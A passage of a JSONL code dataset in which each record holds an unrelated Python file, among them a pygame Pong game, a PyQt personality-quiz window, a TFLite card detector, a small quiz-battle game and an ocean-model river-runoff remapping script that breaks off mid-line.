page_fault\n\n\n def get_data(self):\n # data = []\n # for i,p,m in enumerate(self.T):\n # data.append((p,m,i,0))\n # return data\n return [list(self.freq)]\n\n def get_list_labels(self) :\n return ['L']\n\n\n","sub_path":"algorithms/LFU_DECAY.py","file_name":"LFU_DECAY.py","file_ext":"py","file_size_in_byte":1813,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"212064303","text":"import sys\nfrom PyQt5.QtWidgets import *\nfrom PyQt5 import QtWidgets\nfrom PyQt5.QtGui import *\nfrom PyQt5 import QtGui\nfrom test2_question2_window import Test2_Question2_Window\nfrom result2_window import Result_Window\n\nclass Test2_Question1_Window(QtWidgets.QMainWindow, QPushButton):\n def __init__(self, parent=None):\n super().__init__()\n self.initUI()\n\n def initUI(self):\n self.setWindowTitle('사람에 관한 당신의 심리 상태')\n self.setWindowIcon(QIcon('./image/icon.png'))\n self.resize(880, 500)\n\n back = QLabel(\"\", self)\n back.resize(880, 500)\n back.move(0, 0)\n back.setStyleSheet('image:url(./image/background.png); border:0px;')\n\n # 로고\n logo = QLabel(\"\", self)\n logo.resize(100, 50)\n logo.move(30, 30)\n logo.setStyleSheet('image:url(./image/logo.png); border:0px;')\n\n # 테스트 이름\n self.name_label = QLabel(\"이수빈\", self)\n self.name_label.setFont(QtGui.QFont(\"맑은 고딕\", 13))\n self.name_label.resize(80, 60)\n self.name_label.move(40, 100)\n\n self.label = QLabel(\" 의 사람에 관한 심리 상태는?\", self)\n self.label.setFont(QtGui.QFont(\"맑은 고딕\", 13))\n self.label.resize(800, 60)\n self.label.move(40, 100)\n\n #질문\n self.q1 = QLabel(\"TV를 틀었을 때 화면에 나온 사람은?\", self)\n self.q1.setFont(QtGui.QFont(\"맑은 고딕\", 20))\n self.q1.resize(800, 60)\n self.q1.move(40, 140)\n\n #답 버튼\n # 답 입력받기\n self.answer = QLineEdit(\"\", self)\n self.answer.setFont(QtGui.QFont(\"맑은 고딕\", 20))\n self.answer.setStyleSheet(\"overflow-x:hidden;\" \"overflow-y:hidden\")\n self.answer.resize(800, 100)\n self.answer.move(40, 210)\n\n self.a = QPushButton(\"Next\", self)\n self.a.setFont(QtGui.QFont(\"맑은 고딕\", 20))\n self.a.resize(800, 100)\n self.a.move(40, 320)\n self.a.clicked.connect(self.a_click)\n\n self.test2_question2_window = Test2_Question2_Window(self)\n self.result2_window = Result_Window(self)\n\n def a_click(self):\n self.test2_question2_window.show()\n user_name = self.name_label.text()\n answer = self.answer.text()\n\n self.test2_question2_window.name_label.setText(user_name)\n self.test2_question2_window.t.setText(answer)\n #self.result2_window.answer1.setText(answer)\n\n print(user_name, \">>> TV를 틀었을 때 나온 사람은 ? >>> \", self.answer.text())\n\n #print(self.name_label.text() + \" : a 선택\")\n if self.label.text() == \" is state of mind these days\":\n self.test2_question2_window.label.setText(\" is state of mind these days\")\n self.test2_question2_window.q1.setText(\"While you are walking down the street, a bug appeared in front of you. How many bugs are there?\")\n elif self.label.text() == \"最近の僕の心理状態。\":\n self.test2_question2_window.label.setText(\"最近の僕の心理状態。\")\n self.test2_question2_window.q1.setText(\"あなたが通りを歩いていると、目の前に虫が現れました。 バグはいくつありますか?\")\n self.hide()\n\n","sub_path":"test2_question1_window.py","file_name":"test2_question1_window.py","file_ext":"py","file_size_in_byte":3307,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"218354137","text":"import cv2\nimport numpy as np\nimport tensorflow as tf\nfrom scipy import ndimage\nfrom functions import *\nfrom tflite_runtime.interpreter import load_delegate\n\nsize = (250,250)\n\ncap = cv2.VideoCapture(0)\n\ninterpreter = tf.lite.Interpreter(model_path=\"../CNN_V2_git.tflite\",experimental_delegates=[load_delegate('libedgetpu.so.1.0')])\ninterpreter.allocate_tensors()\n\ninput_details = interpreter.get_input_details()\noutput_details = interpreter.get_output_details()\n\nheight = input_details[0]['shape'][1]\nwidth = input_details[0]['shape'][2]\n\nwhile True:\n _, frame = cap.read()\n #frame = cv2.cvtColor(frame,cv2.COLOR_BGR2RGB)\n cropped,box = find_card(frame)\n cropped = cv2.resize(cropped,(160,160))\n cropped_cpy = cropped.copy()\n \n cropped = cropped.astype(np.float32)\n input_data = np.expand_dims(cropped, axis=0)\n \n interpreter.set_tensor(input_details[0]['index'], input_data)\n interpreter.invoke()\n prediction = interpreter.get_tensor(output_details[0]['index'])\n pred_id=np.argmax(prediction,axis=-1)\n pred_label=CLASS_NAMES[int(pred_id)]\n \n frame = cv2.resize(frame,size)\n x,y,w,h = box[0]\n cv2.rectangle(frame,(x,y),(x+w,y+h),(0,255,0),1)\n cv2.putText(frame,pred_label,(x,y), cv2.FONT_HERSHEY_SIMPLEX, 0.3, (0, 0, 0), 1, cv2.LINE_AA)\n frame = cv2.resize(frame,(750,750))\n cv2.imshow('frame',frame)\n #cv2.imshow('cropped',cropped)\n cv2.imshow('ROI',cropped_cpy)\n key = cv2.waitKey(1)\n \n#closing all open windows \ncv2.destroyAllWindows() \n\n\n\n\n","sub_path":"Core/one_card.py","file_name":"one_card.py","file_ext":"py","file_size_in_byte":1517,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"81018399","text":"import pygame\nimport time\n\ndisplay_size = (800, 600)\nwhite = (255, 255, 255)\nblack = (0, 0, 0)\ngame_display = None\nroof_bound = 11.600000000007093\nfloor_bound = 590.4000000000592\npaddle_speed = 5\ninit_ball_speed = 4\nfps = 60\n\nclass Ball(object):\n def __init__(self, radius):\n self.x = int(display_size[0] / 2)\n self.y = int(display_size[1] / 2)\n self.radius = radius\n self.topbound = self.y - self.radius\n self.botbound = self.y + self.radius\n self.leftbound = self.x - self.radius\n self.rightbound = self.x + self.radius\n self.xvelo = init_ball_speed\n self.yvelo = init_ball_speed\n\n def wipe(self):\n pygame.draw.circle(game_display, black, (self.x, self.y), self.radius)\n\n def draw(self):\n pygame.draw.circle(game_display, white, (self.x, self.y), self.radius)\n\n def update(self):\n self.wipe()\n self.x += self.xvelo\n self.y += self.yvelo\n self.topbound = self.y - self.radius\n self.botbound = self.y + self.radius\n self.leftbound = self.x - self.radius\n self.rightbound = self.x + self.radius\n self.draw()\n pygame.display.update()\n\n def checkCollisions(self):\n for blocker in barriers:\n if blocker == top:\n if self.topbound - abs(self.yvelo) <= blocker.botbound:\n self.yvelo *= -1\n\n if blocker == bot:\n if self.botbound + self.yvelo >= blocker.topbound:\n self.yvelo *= -1\n\n if blocker == leftpad:\n if self.leftbound - abs(self.xvelo) <= blocker.rightbound:\n if blocker.botbound >= self.y - self.radius and blocker.topbound <= self.y + self.radius:\n self.xvelo = int((abs(self.y - (leftpad.y + leftpad.height / 2))//10)+4)\n\n if blocker == rightpad:\n if self.rightbound + self.xvelo >= blocker.leftbound:\n if blocker.botbound >= self.y - self.radius and blocker.topbound <= self.y + self.radius:\n self.xvelo = -int((abs(self.y - (rightpad.y + rightpad.height / 2))//10)+4)\n\n def checkEnd(self):\n if self.x <= leftpad.leftbound or self.x >= rightpad.rightbound:\n return False\n return True\n\n\nclass Barrier(object):\n def __init__(self, pos, width, height):\n self.x = pos[0]\n self.y = pos[1]\n self.width = width\n self.height = height\n self.topbound = self.y\n self.botbound = self.y + self.height\n self.leftbound = self.x\n self.rightbound = self.x + self.width\n\n def draw(self):\n pygame.draw.rect(game_display, white, (self.x, self.y, self.width, self.height))\n\n def wipe(self):\n pygame.draw.rect(game_display, black, (self.x, self.y, self.width, self.height))\n\n\nclass Paddle(Barrier):\n def move(self, distance):\n if distance < 0:\n if roof_bound >= self.y:\n return\n\n elif distance > 0:\n if floor_bound <= self.y + self.height + paddle_speed:\n return\n\n self.wipe()\n self.y += distance\n self.topbound = self.y\n self.botbound = self.y + self.height\n self.leftbound = self.x\n self.rightbound = self.x + self.width\n self.draw()\n pygame.display.update()\n\n\ndef initGame():\n pygame.init()\n\n global game_display, clock\n game_display = pygame.display.set_mode(display_size)\n pygame.display.set_caption(\"Pong\")\n clock = pygame.time.Clock()\n\n\ndef initObjects():\n global top, bot, leftpad, rightpad, ball, barriers\n\n ball = Ball(8)\n top = Barrier((0, 0), 800, 10)\n bot = Barrier((0, 590), 800, 10)\n leftpad = Paddle((0, 270), 10, 60)\n rightpad = Paddle((790, 270), 10, 60)\n barriers = [top, bot, leftpad, rightpad]\n\n top.draw()\n bot.draw()\n leftpad.draw()\n rightpad.draw()\n ball.draw()\n pygame.display.update()\n\n\ndef drawObjects():\n leftpad.wipe()\n rightpad.wipe()\n ball.wipe()\n leftpad.draw()\n rightpad.draw()\n ball.draw()\n pygame.display.update()\n\n\ndef game():\n w = False\n s = False\n up = False\n down = False\n run = True\n\n while run:\n run = ball.checkEnd()\n for event in pygame.event.get():\n try:\n if event.key == pygame.K_UP:\n if event.type == pygame.KEYUP:\n up = False\n if event.type == pygame.KEYDOWN:\n up = True\n if event.key == pygame.K_DOWN:\n if event.type == pygame.KEYUP:\n down = False\n if event.type == pygame.KEYDOWN:\n down = True\n if event.key == pygame.K_w:\n if event.type == pygame.KEYUP:\n w = False\n if event.type == pygame.KEYDOWN:\n w = True\n if event.key == pygame.K_s:\n if event.type == pygame.KEYUP:\n s = False\n if event.type == pygame.KEYDOWN:\n s = True\n\n except AttributeError:\n pass\n\n if event.type == pygame.QUIT:\n run = False\n\n if up:\n rightpad.move(-paddle_speed)\n\n elif down:\n rightpad.move(paddle_speed)\n\n if w:\n leftpad.move(-paddle_speed)\n\n elif s:\n leftpad.move(paddle_speed)\n\n ball.checkCollisions()\n ball.update()\n clock.tick(fps)\n\n for i in range(3, 0, -1):\n print(\"Ending in {0}\".format(i))\n time.sleep(1)\n pygame.quit()\n exit(0)\n\n\ninitGame()\ninitObjects()\ngame()\n","sub_path":"pong.py","file_name":"pong.py","file_ext":"py","file_size_in_byte":5782,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"418625716","text":"# vim: tabstop=4 shiftwidth=4 softtabstop=4\n\n# Copyright 2013 OpenStack Foundation\n# All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nimport logging\n\nfrom tempest.openstack.common import cfg\n\nLOG = logging.getLogger(__name__)\n\ncli_opts = [\n cfg.BoolOpt('enabled',\n default=True,\n help=\"enable cli tests\"),\n cfg.StrOpt('cli_dir',\n default='/usr/local/bin/',\n help=\"directory where python client binaries are located\"),\n]\n\nCONF = cfg.CONF\ncli_group = cfg.OptGroup(name='cli', title=\"cli Configuration Options\")\nCONF.register_group(cli_group)\nCONF.register_opts(cli_opts, group=cli_group)\n","sub_path":"cli/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1197,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"11600764","text":"import subprocess\n\nSTAGE = 'alpha'\n\nVERSION = (1, 2, 0, STAGE)\n\n\ndef get_version():\n number = '.'.join(map(str, VERSION[:3]))\n stage = VERSION[3]\n if stage == 'final':\n return number\n elif stage == 'alpha':\n process = subprocess.Popen('git rev-parse HEAD'.split(), stdout=subprocess.PIPE)\n stdout, stderr = process.communicate()\n return number + '-' + stdout.decode('utf-8').strip()[:8]\n","sub_path":"betterforms/version.py","file_name":"version.py","file_ext":"py","file_size_in_byte":427,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"571072582","text":"# This demos sprites using Pillow/PIL images\n# See here for more details:\n# https://pillow.readthedocs.io/en/stable/reference/Image.html\n\n# This uses a spritestrip from this tutorial:\n# https://www.codeandweb.com/texturepacker/tutorials/how-to-create-a-sprite-sheet\nfrom cmu_112_graphics import *\n\nclass DerekApp(Mode):\n def appStarted(self):\n self.initBattleImages()\n\n def initBattleImages(self):\n p1 = '/Users/tony/Desktop/15112/hack112/sprite.png'\n p2 = '/Users/tony/Desktop/15112/hack112/sprite7.png'\n url2 = '/Users/tony/Desktop/15112/hack112/text2.png'\n url3 = '/Users/tony/Desktop/15112/hack112/battleground.jpg'\n self.healthbars = self.app.classRoomMode.healthbars\n death='/Users/tony/Desktop/15112/hack112/death.png'\n win='/Users/tony/Desktop/15112/hack112/win.png'\n desk='/Users/tony/Desktop/15112/hack112/pixeldesk.png'\n self.deskImg = self.loadImage(desk)\n self.deathIcon= self.loadImage(death)\n self.winIcon= self.loadImage(win)\n self.imageText = self.loadImage(url2)\n self.battleground = self.loadImage(url3)\n self.x=self.width/2\n self.y=self.height/2\n spritestrip = self.loadImage(p1)\n spritestrip2 = self.loadImage(p2)\n ############\n self.spritesDown2 = [ ]\n spriteRow = spritestrip2.crop((0, 0, 256, 64))\n for i in range(4):\n sprite=spriteRow.crop((64*i,0,64*(i+1),64))\n self.spritesDown2.append(sprite)\n ##############\n self.spritesDown = [ ]\n spriteRow = spritestrip.crop((0, 0, 256, 64))\n for i in range(4):\n sprite=spriteRow.crop((64*i,0,64*(i+1),64))\n self.spritesDown.append(sprite)\n self.spritesLeft = [ ]\n spriteRow = spritestrip.crop((0, 64, 256, 128))\n for i in range(4):\n sprite=spriteRow.crop((64*i,0,64*(i+1),64))\n self.spritesLeft.append(sprite)\n self.spritesRight = [ ]\n spriteRow = spritestrip.crop((0, 128, 256, 192))\n for i in range(4):\n sprite=spriteRow.crop((64*i,0,64*(i+1),64))\n self.spritesRight.append(sprite)\n self.spritesUp = [ ]\n spriteRow = spritestrip.crop((0, 192, 256, 256))\n for i in range(4):\n sprite=spriteRow.crop((64*i,0,64*(i+1),64))\n self.spritesUp.append(sprite)\n self.down=True\n self.up=False\n self.left=False\n self.right=False\n self.spriteCounter = 0\n self.speech=False\n self.inBattleMode()\n\n def inBattleMode(self):\n self.inBattle=True\n self.kosInitMessage=False\n self.battleEnterCount=0\n self.attackChoice=False\n self.kickOut=False\n self.passed=False\n self.profHealth=0\n self.TAHealth=self.app.classRoomMode.TAHealth\n self.TAwin=False\n self.TAlose=False\n self.codeBattle()\n self.testCount=0\n\n def codeBattle(self):\n self.codeBattleMode=False\n self.question1=True\n self.question2=False\n self.question3=False\n self.question1Ans1=0\n self.question1Ans2=2\n self.question2Ans1=0\n self.question2Ans2=1\n self.question3Ans1=0\n self.question3Ans2=1\n self.ansBox1=[False,False,False]\n self.ansBox2=[False,False,False]\n self.ansPos1=[(self.width/5+17,60+87),(self.width/5+17,60+127),(self.width/5+17,60+167)]\n self.ansPos2=[(self.width/5+17,60+210+87),(self.width/5+17,60+210+127),(self.width/5+17,60+210+167)]\n\n\n def dist(self,x0,y0,x1,y1):\n return (((x1-x0)**2+(y1-y0)**2)**.5)\n\n def keyPressed(self,event):\n if (event.key==\"Up\"):\n self.up=True\n self.left=False\n self.right=False\n self.down=False\n self.y-=5\n self.spriteCounter = (self.spriteCounter+1)%(len(self.spritesUp))\n elif (event.key==\"Down\"):\n self.up=False\n self.left=False\n self.right=False\n self.down=True\n self.y+=5\n self.spriteCounter = (self.spriteCounter+1)%(len(self.spritesDown))\n elif (event.key==\"Right\"):\n self.up=False\n self.left=False\n self.right=True\n self.down=False\n self.x+=5\n self.spriteCounter = (self.spriteCounter+1)%(len(self.spritesRight))\n elif (event.key==\"Left\"):\n self.up=False\n self.left=True\n self.right=False\n self.down=False\n self.x-=5\n self.spriteCounter = (self.spriteCounter+1)%(len(self.spritesLeft))\n elif (event.key==\"Enter\"):\n self.speech=not self.speech\n #Battle\n elif (event.key==\"1\"):\n self.inBattle=True\n if self.inBattle:\n if (event.key==\"Enter\" and self.battleEnterCount==0):\n self.kosInitMessage=True\n self.battleEnterCount+=1\n elif (event.key==\"Enter\" and self.battleEnterCount==1):\n self.attackChoice=True\n self.battleEnterCount+=1\n elif (self.attackChoice):\n if event.key==\"a\":\n self.TAHealth+=1\n if (self.TAHealth>=3):\n self.TAlose=True\n elif event.key==\"f\":\n self.codeBattleMode=True\n if (self.profHealth>=3):\n self.TAwin=True\n elif event.key==\"r\":\n self.inBattle=False\n elif (event.key==\"r\" and (self.TAlost or self.TAwin)):\n self.appStarted()\n count=0\n if (self.codeBattleMode and event.key==\"Enter\"):\n if (self.TAHealth>=3):\n self.TAlose=True\n if (self.profHealth>=3):\n self.TAwin=True\n anspos1=0\n anspos2=0\n for i in range (len(self.ansBox1)):\n if self.ansBox1[i]==True:\n anspos1=i\n for j in range (len(self.ansBox2)):\n if self.ansBox2[j]==True:\n anspos2=j\n if (self.question1):\n if self.checkForCorrect(anspos1,self.question1Ans1):\n count+=1\n if self.checkForCorrect(anspos2,self.question1Ans2):\n count+=1\n elif (self.question2):\n if self.checkForCorrect(anspos1,self.question2Ans1):\n count+=1\n if self.checkForCorrect(anspos2,self.question2Ans2):\n count+=1\n elif (self.question3):\n if self.checkForCorrect(anspos1,self.question3Ans1):\n count+=1\n if self.checkForCorrect(anspos2,self.question3Ans2):\n count+=1\n if count>=2:\n self.profHealth+=1\n elif count==1:\n self.TAHealth+=1\n self.codeBattle()\n self.testCount=(self.testCount+1)%3\n if (self.testCount==0):\n self.question1=True\n self.question2=False\n self.question3=False\n elif (self.testCount==1):\n self.question1=False\n self.question2=True\n self.question3=False\n elif (self.testCount==2):\n self.question1=False\n self.question2=False\n self.question3=True\n\n def checkForCorrect(self,ansPos,givenAnsPos):\n if ansPos==givenAnsPos:\n return True\n return False\n\n def mousePressed(self,event):\n for i in range(len(self.ansPos1)):\n x,y = self.ansPos1[i]\n if self.dist(event.x, event.y, x, y) <= 7:\n self.ansBox1[i] = True\n self.ansBox1[(i+1)%3] = False\n self.ansBox1[(i-1)%3] = False\n for i in range(len(self.ansPos2)):\n x,y = self.ansPos2[i]\n if self.dist(event.x, event.y, x, y) <= 7:\n self.ansBox2[i] = True\n self.ansBox2[(i+1)%3] = False\n self.ansBox2[(i-1)%3] = False\n\n def madeMove(self, move):\n self.attackChoice=False\n if move==\"argue\":\n self.kickOut=True\n elif move==\"smile\":\n self.passed=True\n\n def timerFired(self):\n if (self.testCount==0):\n self.question1=True\n self.question2=False\n self.question3=False\n elif (self.testCount==1):\n self.question1=False\n self.question2=True\n self.question3=False\n elif (self.testCount==2):\n self.question1=False\n self.question2=False\n self.question3=True\n \n def drawSpeech(self, canvas, text):\n canvas.create_rectangle(40,315,510,460,fill=\"white\")\n canvas.create_image(self.width/2, self.height, anchor=\"s\",\n image=ImageTk.PhotoImage(self.imageText))\n \n canvas.create_text(self.width/2, self.height-90,\n text=text,\n font=\"Courier 16\")\n \n def drawBattleground(self,canvas):\n canvas.create_image(self.width/2, self.height/2,\n image=ImageTk.PhotoImage(self.battleground))\n p1=self.scaleImage(self.spritesUp[2], 2.5)\n canvas.create_image(self.width/3, 4.3*self.height/8,\n image=ImageTk.PhotoImage(p1))\n TAHealth=self.healthbars[self.TAHealth]\n health=self.scaleImage(TAHealth, .4)\n canvas.create_image(self.width/3, 4.3*self.height/8-50, image=ImageTk.PhotoImage(health))\n\n p2=self.scaleImage(self.spritesDown2[2], 1.7)\n canvas.create_image(1.7*self.width/3, 1.4*self.height/4,\n image=ImageTk.PhotoImage(p2))\n profHealth=self.healthbars[self.profHealth]\n health=self.scaleImage(profHealth, .6)\n canvas.create_image(1.7*self.width/3, 1.4*self.height/4-60,image=ImageTk.PhotoImage(health))\n self.drawSpeech(canvas,\n \"You are now facing the final boss...\\nProfessor Kosbae\")\n\n def drawWinScreen(self,canvas):\n canvas.create_text(self.width/2,self.height/2,text=\"TA Wins\",font=\"Courier 30\")\n ta=self.scaleImage(self.spritesDown[2], 2.5)\n canvas.create_image(self.width/5, self.height/2,\n image=ImageTk.PhotoImage(ta))\n trop=self.scaleImage(self.winIcon, .2)\n canvas.create_image(self.width/5, self.height/2+150,\n image=ImageTk.PhotoImage(trop))\n prof=self.scaleImage(self.spritesDown2[2], 2.5)\n canvas.create_image(4*self.width/5, self.height/2,\n image=ImageTk.PhotoImage(prof))\n death=self.scaleImage(self.deathIcon, .6)\n canvas.create_image(4*self.width/5, self.height/2,\n image=ImageTk.PhotoImage(death))\n\n def drawLoseScreen(self, canvas):\n canvas.create_text(self.width/2,self.height/2,text=\"TA Loses\",font=\"Courier 30\")\n ta=self.scaleImage(self.spritesDown[2], 2.5)\n canvas.create_image(self.width/5, self.height/2,\n image=ImageTk.PhotoImage(ta))\n death=self.scaleImage(self.deathIcon, .6)\n canvas.create_image(self.width/5, self.height/2,\n image=ImageTk.PhotoImage(death))\n prof=self.scaleImage(self.spritesDown2[2], 2.5)\n canvas.create_image(4*self.width/5, self.height/2,\n image=ImageTk.PhotoImage(prof))\n trop=self.scaleImage(self.winIcon, .2)\n canvas.create_image(4*self.width/5, 2*self.height/3+50,\n image=ImageTk.PhotoImage(trop))\n canvas.create_text(self.width/2,2*self.height/3,text=\"Press r to restart\",font=\"Courier 20\")\n\n def drawCodeBattle(self,canvas):\n desk=self.scaleImage(self.deskImg, 1.2)\n canvas.create_image(self.width/2,self.height/2,image=ImageTk.PhotoImage(desk))\n canvas.create_rectangle(self.width/5,20,self.width*4/5,self.height-20,fill=\"white\")\n if (self.question1):\n canvas.create_text(self.width/2,40,text=\"Final Exam Part 1\", font=\"Courier 16\")\n self.drawQuestion(canvas,\"1\",\"\"\"def checkForWin(board, player):\n \\n winningWord = player * 4\n \\n return _____\"\"\",\n \n \"(wordSearch(board, winningWord) != None)\",\"(wordSearch(board, winningWord) = None)\",\"(wordSearchFromCell(board, winningWord)\",\n self.ansBox1)\n self.drawQuestion(canvas,\"2\",\"\"\"What is the big O of this function?\\n\\nL.sort()\"\"\",\n \n \"O(N)\",\"O(logN)\",\"O(NlogN)\",\n self.ansBox2)\n elif (self.question2):\n canvas.create_text(self.width/2,40,text=\"Final Exam Part 2\", font=\"Courier 16\")\n self.drawQuestion(canvas,\"1\",\"\"\"def distance(x1, y1, x2, y2):\n \\n return (_______ + (y2 - y1)**2)**0.5\"\"\",\n \n \"(x2 - x1)**2\",\"(y2 + y1)**2\",\"Ans 3\",self.ansBox1)\n self.drawQuestion(canvas,\"2\",\"\"\"Given the list L=[3,None,False], \\n\\nwhich of the following functions \\n\\n crashes?\"\"\",\n \n \n \"min(L)\",\"L.pop(-2)\",\"L[Carpe Diem]+1\",self.ansBox2)\n elif (self.question3):\n canvas.create_text(self.width/2,40,text=\"Final Exam Part 3\", font=\"Courier 16\")\n self.drawQuestion(canvas,\"1\",\"\"\"How do you access the number of \n \\n columns in the 2D List L?\"\"\",\n \n \"len(L[0)]\",\"set(len(L[5])\",\":/\",self.ansBox1)\n self.drawQuestion(canvas,\"2\",\"\"\"What type of animal is Professor\n \\n Taylor's pet?\"\"\",\n \n \"pig\",\"axolotl\",\"dragon\",self.ansBox2)\n\n def drawQuestion(self, canvas, num, question,a1,a2,a3,ansBox):\n color=[]\n r=7\n for boo in ansBox:\n if boo==False:\n color.append(\"white\")\n else:\n color.append(\"green\")\n canvas.create_oval(self.width/5+17-r,60+210*(int(num)-1)+87-r,self.width/5+17+r,60+210*(int(num)-1)+87+r,fill=color[0])\n canvas.create_oval(self.width/5+17-r,60+210*(int(num)-1)+127-r,self.width/5+17+r,60+210*(int(num)-1)+127+r,fill=color[1])\n canvas.create_oval(self.width/5+17-r,60+210*(int(num)-1)+167-r,self.width/5+17+r,60+210*(int(num)-1)+167+r,fill=color[2])\n canvas.create_text(self.width/5+10,60+210*(int(num)-1), anchor=\"nw\",text=num+\".) \"+ question,font=\"Courier 13\")\n canvas.create_text(self.width/5+35,60+210*(int(num)-1)+80, anchor=\"nw\",text=a1,font=\"Courier 12\")\n canvas.create_text(self.width/5+35,60+210*(int(num)-1)+120, anchor=\"nw\",text=a2,font=\"Courier 12\")\n canvas.create_text(self.width/5+35,60+210*(int(num)-1)+160, anchor=\"nw\",text=a3,font=\"Courier 12\")\n \n \n def redrawAll(self, canvas):\n if not (self.TAlose or self.TAwin):\n if self.inBattle:\n self.drawBattleground(canvas)\n if (self.kosInitMessage and self.battleEnterCount==1):\n text=\"Prof Kosbae: Welcome to the Final Exam ...\\nwhats your first move?\"\n self.drawSpeech(canvas, text)\n elif (self.attackChoice):\n self.drawSpeech(canvas, \"\"\"What is your move?:\n \\n- Argue (a)\\n- Start the test (f)\\n- Run (r)\"\"\")\n if (self.codeBattleMode):\n self.drawCodeBattle(canvas)\n elif (self.kickOut):\n self.drawSpeech(canvas, \"\"\"You have been kicked out from 15-112,\n \\n try harder next time\"\"\")\n elif (self.passed):\n self.drawSpeech(canvas, \"\"\"You have now passed 15-112!\"\"\")\n else:\n if self.up:\n sprite=self.spritesUp[self.spriteCounter]\n elif self.down:\n sprite=self.spritesDown[self.spriteCounter]\n elif self.right:\n sprite=self.spritesRight[self.spriteCounter]\n elif self.left:\n sprite=self.spritesLeft[self.spriteCounter]\n canvas.create_image(self.x, self.y, image=ImageTk.PhotoImage(sprite))\n TAHealth=self.healthbars[self.TAHealth]\n health=self.scaleImage(TAHealth, .2)\n canvas.create_image(self.x, self.y-20, image=ImageTk.PhotoImage(health))\n if (self.speech):\n self.drawSpeech(canvas,\"Hi, my name is TA\")\n elif(self.TAwin):\n self.drawWinScreen(canvas)\n elif(self.TAlose):\n self.drawLoseScreen(canvas)\n\n\nDerekApp(width=544, height=480)","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":17500,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"549899996","text":"import numpy as np\nimport os\ntry:\n import netCDF4 as netCDF\nexcept:\n import netCDF3 as netCDF\nimport matplotlib.pyplot as plt\nimport time\nimport datetime\nfrom matplotlib.dates import date2num, num2date\n\nimport pyroms\nimport pyroms_toolbox\nfrom pyroms import _remapping\nimport xarray as xr\n\nclass nctime(object):\n pass\n\ndef remap_river(src_file, src_varname, dst_grd, dst_mask, dst_dir='./'):\n\n ocn_lon = xr.open_dataset(dst_grd).x[1::2,1::2] # Cell-center longitudes (cell centers)\n ocn_lat = xr.open_dataset(dst_grd).y[1::2,1::2] # Cell-center latitudes (cell centers)\n lon_b = xr.open_dataset(dst_grd).x[::2,::2] # Corner longitudes\n lat_b = xr.open_dataset(dst_grd).y[::2,::2] # Corner latitudes\n coords = xr.Dataset({\"lon\": ocn_lon, \"lat\": ocn_lat})\n coords2 = xr.Dataset({\"lon_b\": lon_b, \"lat_b\": lat_b })\n coords = coords.rename({'nyp': 'ny', 'nxp': 'nx'})\n coords = coords.merge(coords2)\n\n dx = xr.open_dataset(dst_grd).dx[1::2,::2] + xr.open_dataset(dst_grd).dx[1::2,1::2]\n dy = xr.open_dataset(dst_grd).dy[::2,1::2] + xr.open_dataset(dst_grd).dy[1::2,1::2]\n area_dst = dx.data * dy.data\n mask_rho = xr.open_dataset(dst_mask).mask\n\n # get time\n nctime.long_name = 'time'\n nctime.units = 'days since 1900-01-01 00:00:00'\n time0 = datetime.date(1900, 1, 1)\n\n # create runoff file\n dst_file = src_file.rsplit('/')[-1]\n dst_file = dst_dir + dst_file[:-3] + '_' + src_varname + '_Hill_NGOA.nc'\n print('\\nCreating file', dst_file)\n if os.path.exists(dst_file) is True:\n os.remove(dst_file)\n\n # open River file\n nc = netCDF.Dataset(dst_file, 'w', format='NETCDF4')\n nc.Author = 'pyroms_toolbox.nc_create_roms_file'\n nc.Created = datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\n nc.title = 'MOM6 runoff file'\n\n Mp, Lp = (lon_b.shape)\n nc.createDimension('IQ', Lp)\n nc.createDimension('JQ', Mp)\n nc.createDimension('i', Lp-1)\n nc.createDimension('j', Mp-1)\n nc.createDimension('time', None)\n\n #load var\n cf = xr.open_dataset(src_file)\n years = cf.year.data\n months = cf.month.data\n days = cf.day.data\n src_lon = cf.lon.data + 360.0\n src_lat = cf.lat.data\n\n src_var_all = cf.q.data\n\n #get missing value\n spval = 1.e30\n\n# dst_varname = 'Runoff_raw'\n# dimensions = ('time', 'j', 'i')\n# long_name = 'river discharge'\n# units = 'meter^3/sec'\n\n # create variable in file\n nc.createVariable('time', 'f8', ('time'))\n nc.variables['time'].units = 'days since 1900-01-01'\n nc.variables['time'].calendar = 'gregorian'\n# print('Creating variable', dst_varname)\n# nc.createVariable(dst_varname, 'f8', dimensions, fill_value=spval)\n# nc.variables[dst_varname].long_name = long_name\n# nc.variables[dst_varname].units = 'm^3/day'\n\n nc.createVariable('Runoff', 'f8', ('time', 'j', 'i'), fill_value=spval)\n nc.variables['Runoff'].long_name = 'Hill River Runoff'\n nc.variables['Runoff'].units = 'kg/m^2/sec'\n\n # get littoral (here just 1 cell wide, with diagonals)\n width = 1\n idx = []\n idy = []\n maskl = mask_rho.copy()\n for w in range(width):\n lit = pyroms_toolbox.get_littoral(maskl)\n idx.extend(lit[0])\n idy.extend(lit[1])\n maskl[lit] = 0\n\n littoral_idx = (np.array(idx), np.array(idy))\n\n ntimes = len(years)\n for it in range(ntimes):\n src_var = src_var_all[it,:]/86400.0\n net_flow = np.sum(src_var)\n src_var = xr.DataArray(src_var)\n src_var = src_var.fillna(0)\n src_var = src_var.data\n print(src_var.shape)\n\n time = datetime.date(years[it], months[it], days[it])\n print('time =', time)\n\n # horizontal interpolation\n print('horizontal interpolation using brute force')\n\n\n # write data in destination file\n print('write data in destination file')\n nc.variables['time'][it] = (time - time0).days\n\n runoff = pyroms_toolbox.remap_river(src_var, src_lon, src_lat, \\\n 